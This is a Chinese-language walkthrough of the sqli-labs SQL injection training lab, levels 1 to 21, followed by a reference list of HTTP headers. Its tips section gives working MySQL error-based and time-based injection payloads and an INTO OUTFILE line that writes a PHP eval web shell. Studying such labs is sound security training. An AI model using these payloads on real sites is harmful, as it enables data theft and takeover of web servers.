sqli-labs page-1

一、前言

终于通关了page-1的内容，现在做一下阶段性的总结。不做过多详细的教程，主要放 payload。需要详细思路分析前看先前的一些教程

二、注入思路

三、各关卡讲解

level-1

第一关经过简单测试发现是单引号注入

附一下测试用例

id=1'     报错

id=1'  or '1'='1  正确

大多关卡都可以使用上述方法进行不同的测试，确定对服务器对参数的处理方式

level-2

数字型

level-3

('  ')

level-4

（“”）

level-5

level5后变成了盲注，在本关中，服务器只返回查询正确，查询错误两种信息

根据上面我总结的sql注入思路图，在这里可以使用

1.布尔型注入

2.报错型注入

3.延时性注入

4.文件写入、读取注入

考虑到本关没有对返回的错误信息做出限制，布尔型注入，延时性注入手工注入耗时长的特点

使用报错型注入

可以考虑使用下图的方法，以及exp，！，extractvalue，updatexml等方法进行报错型注入，相关知识总结会在下一章节放出

level-6

与第五关类似，只是对参数的处理有所不同（双引号注入）

level-7

发现服务器只返回通用的错误信息了，因此不能使用报错型注入了

根据题目的提示，尝试使用文件上传，读取注入方式进行

level-8

这一关服务器只返回了查询正确，查询错误不作返回，因此其实不太建议使用布尔型注入（因为在一次查询正确后，网站会一直显示查询正确的情况，从而容易影响到你的判断），延时型注入可行，

可以看到，杀毒软件发现了上传的一句话，因此证明注入成功

level-9

经过初步的测试其实可以发现，无论输入的id正确与否，返回的都是You are in……即上面思路中的第四种，因此考虑使用延时性注入或一句话

之后测试对参数的处理情况：通过下面的payload发现 使用单引号对参数处理

下面是获取数据库信息的payload

level-10

与上题无异，只是对参数的处理换成了双引号

level-11

本关开始数据的提交方式改为post

本关是简单的常规型单引号注入（非盲注）

level-12

本关也是简单的注入，参数处理为("")

level-13

本关为盲注，返回错误信息，参数处理为('')，使用报错型注入提高效率

level-14

盲注，返回错误，参数处理为双引号，使用报错型注入提高效率

level-15

盲注，返回通用错误型，参数处理为单引号，只能使用延时型和一句话型

这里使用了延时型

level-16

与level15无异，参数处理为1")

level-17

题目提示为update语句注入，因此设想此处的update语句为

UPDATE users SET password = '$passwd' WHERE username='$username'

因此构造payload如下

level-18

http头注入

经过逐个测试可以发现User-Agent存在可注入点

level-19

http头注入

经过逐个测试可以发现referer存在可注入点

level-20

还是看题目提示，cookie注入

level-21

一样是cookie注入，不过可以发现使用了base64编码处理，easy啦

四、注入小姿势

该部分内容参考《Mysql 注入---sqlilabs---lcamry》

（一）盲注

.1.布尔型盲注

①left(a,b)

从左侧截取a的前b位

②substr(a,b,c)，mid(a,b,c)

从b位置开始截取字符串a的c长度

③ascii()，ord()

将某字符转换成ascii值

④regexp正则匹配，like匹配

2.报错型盲注

①Select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;

重复特性

②select exp(~(select * FROM(SELECT USER())a))

数据溢出

③extractvalue(1,concat(0x7e,(select @@version),0x7e))

xpath 语法错误

④updatexml(1,concat(0x7e,(select @@version),0x7e),1)

xpath 语法错误

⑤select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

重复特性

3.延时注入

①if(a,b,c)

如果a正确则b，否则c

②sleep(a)

休眠a秒

4.文件上传，读取

select ……… into outfile 'file_name'   [file_name]不能已存在的文件

a.直接导入内容

select version() into outfile 'c:\\xxx\\xxx\\xxx\\xxx.txt'

select <?php @eval($_POST[\'zzz\']);?> into outfile '文件路径'

b.插入内容到文件结尾

Select version() Into outfile “c:\\phpnow\\htdocs\\test.php” LINES TERMINATED BY 0x16进制文件

（二）HTTP头部

1、Accept：告诉WEB 服务器自己接受什么介质类型，*/* 表示任何类型，type/* 表示该类型下的所有子类型，type/sub-type。
2、Accept-Charset： 浏览器申明自己接收的字符集

      Accept-Encoding： 浏览器申明自己接收的编码方法，通常指定压缩方法，是否支持压缩，支持什么压缩方法（gzip，deflate）
      Accept-Language：：浏览器申明自己接收的语言
3、Accept-Ranges：WEB 服务器表明自己是否接受获取其某个实体的一部分（比如文件的一部分）的请求。bytes：表示接受，none：表示不接受。
4、Age：当代理服务器用自己缓存的实体去响应请求时，用该头部表明该实体从产生到现在经过多长时间了。
5、Authorization：当客户端接收到来自WEB 服务器的WWW-Authenticate 响应时，用该头部来回应自己的身份验证信息给WEB 服务器。
6、Cache-Control：请求：no-cache（不要缓存的实体，要求现在从WEB 服务器去取）
max-age：（只接受Age 值小于max-age 值，并且没有过期的对象）
max-stale：（可以接受过去的对象，但是过期时间必须小于max-stale 值）
min-fresh：（接受其新鲜生命期大于其当前Age 跟min-fresh 值之和的缓存对象）
响应：public(可以用Cached 内容回应任何用户)
private（只能用缓存内容回应先前请求该内容的那个用户）
no-cache（可以缓存，但是只有在跟WEB 服务器验证了其有效后，才能返回给客户端）
max-age：（本响应包含的对象的过期时间）
ALL: no-store（不允许缓存）
7、Connection：请求：close（告诉WEB 服务器或者代理服务器，在完成本次请求的响应后，断开连接，不要等待本次连接的后续请求了）。
keepalive（告诉WEB 服务器或者代理服务器，在完成本次请求的响应后，保持连接，等待本次连接的后续请求）。响应：close（连接已经关闭）。keepalive（连接保持着，在等待本次连接的后续请求）。Keep-Alive：如果浏览器请求保持连接，则该头部表明希望WEB 服务器保持连接多长时间（秒）。例如：Keep-Alive：300
8、Content-Encoding：WEB 服务器表明自己使用了什么压缩方法（gzip，deflate）压缩响应中的对象。例如：Content-Encoding：gzip
9、Content-Language：WEB 服务器告诉浏览器自己响应的对象的语言。
10、Content-Length： WEB 服务器告诉浏览器自己响应的对象的长度。例如：Content-Length:26012
11、Content-Range： WEB 服务器表明该响应包含的部分对象为整个对象的哪个部分。例如：Content-Range: bytes 21010-47021/47022
12、Content-Type： WEB 服务器告诉浏览器自己响应的对象的类型。例如：Content-Type：application/xml
13、ETag：就是一个对象（比如URL）的标志值，就一个对象而言，比如一个html 文件，如果被修改了，其Etag 也会别修改，所以ETag 的作用跟Last-Modified 的作用差不多，主要供WEB 服务器判断一个对象是否改变了。比如前一次请求某个html 文件时，获得了其ETag，当这次又请求这个文件时，浏览器就会把先前获得的ETag 值发送给WEB 服务器，然后WEB 服务器会把这个ETag 跟该文件的当前ETag 进行对比，然后就知道这个文件有没有改变了。
14、Expired：WEB 服务器表明该实体将在什么时候过期，对于过期了的对象，只有在跟WEB 服务器验证了其有效性后，才能用来响应客户请求。是HTTP/1.0 的头部。例如：Expires：Sat, 23 May 2009 10:02:12 GMT
15、Host：客户端指定自己想访问的WEB 服务器的域名/IP 地址和端口号。例如：Host：rss.sina.com.cn
16、If-Match：如果对象的ETag 没有改变，其实也就意味著对象没有改变，才执行请求的动作。
17、If-None-Match：如果对象的ETag 改变了，其实也就意味著对象也改变了，才执行请求的动作。
18、If-Modified-Since：如果请求的对象在该头部指定的时间之后修改了，才执行请求的动作（ 比如返回对象）， 否则返回代码304 ，告诉浏览器该对象没有修改。例如：If-Modified-Since：Thu, 10 Apr 2008 09:14:42 GMT
19、If-Unmodified-Since：如果请求的对象在该头部指定的时间之后没修改过，才执行请求的动作（比如返回对象）。
20、If-Range：浏览器告诉WEB 服务器，如果我请求的对象没有改变，就把我缺少的部分给我，如果对象改变了，就把整个对象给我。浏览器通过发送请求对象的ETag 或者自己所知道的最后修改时间给WEB 服务器，让其判断对象是否改变了。总是跟Range 头部一起使用。
21、Last-Modified：WEB 服务器认为对象的最后修改时间，比如文件的最后修改时间，动态页面的最后产生时间等等。例如：Last-Modified：Tue, 06 May 2008 02:42:43 GMT
22、Location：WEB 服务器告诉浏览器，试图访问的对象已经被移到别的位置了，到该头部指定的位置去取。例如： Location ： http://i0.sinaimg.cn/dy/deco/2008/0528/sinahome_0803_ws_005_text_0.gif
23、Pramga：主要使用Pramga: no-cache，相当于Cache-Control： no-cache。例如：Pragma：no-cache
24、Proxy-Authenticate： 代理服务器响应浏览器，要求其提供代理身份验证信息。Proxy-Authorization：浏览器响应代理服务器的身份验证请求，提供自己的身份信息。
25、Range：浏览器（比如Flashget 多线程下载时）告诉WEB 服务器自己想取对象的哪部分。例如：Range: bytes=1173546-
26、Referer：浏览器向WEB 服务器表明自己是从哪个网页/URL 获得/点击当前请求中的网址/URL。例如：Referer：http://www.sina.com/
27、Server: WEB 服务器表明自己是什么软件及版本等信息。例如：Server：Apache/2.0.61(Unix)
28、User-Agent: 浏览器表明自己的身份（是哪种浏览器）。例如：User-Agent：Mozilla/5.0(Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 Firefox/2、0、0、14
29、Transfer-Encoding: WEB 服务器表明自己对本响应消息体（不是消息体里面的对象）作了怎样的编码，比如是否分块（chunked）。例如：Transfer-Encoding: chunked
30、Vary: WEB 服务器用该头部的内容告诉Cache 服务器，在什么条件下才能用本响应所返回的对象响应后续的请求。假如源WEB 服务器在接到第一个请求消息时，其响应消息的头部为：Content- Encoding: gzip; Vary: Content-Encoding 那么Cache 服务器会分析后续请求消息的头部，检查其Accept-Encoding，是否跟先前响应的Vary 头部值一致，即是否使用相同的内容编码方法，这样就可以防止Cache 服务器用自己Cache 里面压缩后的实体响应给不具备解压能力的浏览器。例如：Vary：Accept-Encoding
31、Via： 列出从客户端到OCS 或者相反方向的响应经过了哪些代理服务器，他们用什么协议（和版本）发送的请求。当客户端请求到达第一个代理服务器时，该服务器会在自己发出的请求里面添加Via 头部，并填上自己的相关信息，当下一个代理服务器收到第一个代理服务器的请求时，会在自己发出的请求里面复制前一个代理服务器的请求的Via 头部，并把自己的相关信息加到后面，以此类推，当OCS 收到最后一个代理服务器的请求时，检查Via 头部，就知道该请求所经过的路由。例如：Via：1.0 236.D0707195.sina.com.cn:80(squid/2.6.STABLE13)